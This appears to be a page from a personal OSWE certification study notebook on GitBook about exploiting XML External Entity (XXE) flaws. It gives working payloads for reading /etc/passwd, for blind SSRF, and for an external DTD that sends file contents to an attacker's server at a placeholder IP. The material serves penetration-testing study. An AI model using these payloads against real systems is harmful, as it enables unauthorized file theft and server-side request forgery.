💻
OSWE Everything
💻
OSWE Everything
  • VULNERABILITIES
    • Type Juggling
    • Cross Site Scripting
      • Hunting for files
    • Insecure Deserialization
      • .NET
    • SQL Injection
      • Blind SQL Injection
      • SQLi debugging
      • Code review
      • Errors and additional information
      • Approaches to leverage different databases
    • XML External Entity (XXE)
      • Types of XML Entities
      • Exploitation
      • Wrappers for errors
      • Post Exploitation
    • OS Command Injection
      • Exploitation
    • Server Side Template Injection
      • Exploitation
    • Authentication Bypass
      • Checklist
  • Unsecure Random Function
    • Exploitation
  • Cross Origin Resource Sharing (CORS)
    • Prerequisites of Exploitation
  • Client Side Request Forgery (CSRF)
    • Prerequisites of Exploitation
  • Exploit Writing
    • Cheatsheet
    • Skeleton Scripts
  • Code review
    • Manual code review
      • Routing
      • Searching for exploits
      • Debugging
    • Decompilation
      • Java
      • .NET
    • Managing the application
      • Identifying application file location
      • Restarting web applications
      • Manipulation of Assembly Attributes for Debugging (.NET)
  • Preparation Machines
    • [HTB] Vault
    • Other HTB scripts
  • ADDITIONAL INFORMATION
    • Sources
  • External Resources
    • WhiteBox Pentest
Powered by GitBook
On this page
  1. VULNERABILITIES
  2. XML External Entity (XXE)

Exploitation

Test if parser replace text with internal entities:

<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY variable "Replaced">
]>

[put &variable; between the tags of some entity
in the application]

XXE file read:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

[put &xxe; in request body aligned with the application login in order to reflect it]

Interesting files:

XXE SSRF:

XXE can be Out out Band (Blind) which means it reaches given url but do not return any data that confirms the connection.

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://<IP>/">]>

[put &xxe; in request body aligned with the application login in order to reflect it]

You can also run it through putting %xxe; before closing tags:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://<IP>/"> %xxe;]>

XXE SSRF via Parameter Entity:

<!DOCTYPE ObjectNameFromDocument [
  <!ENTITY % xxe SYSTEM "http://<IP>/">
  %xxe;
]>

[you do not need to put xxe anywhere in the body of request]

XXE external DTD

Sample .dtd file hosted by an attackers http server:

Script does the following:

  1. Saves //etc/passwd output to file variable

  2. Defines eval parameter which contains dynamic declaration of exfiltrate parameter.

  3. Exfiltrate parameter will be evaluated by sending HTTP requests to attacker's server with file contents.

  4. Running eval turns on possibility of using exfiltrate entity.

  5. Exfiltrate parameter sends the data to an attacker.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<IP>/?x=%file;'>">
%eval;
%exfiltrate;

Sample payload:

injected to webapp

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<IP>/malicious.dtd"> %xxe;]>

PreviousTypes of XML EntitiesNextWrappers for errors

Last updated 1 month ago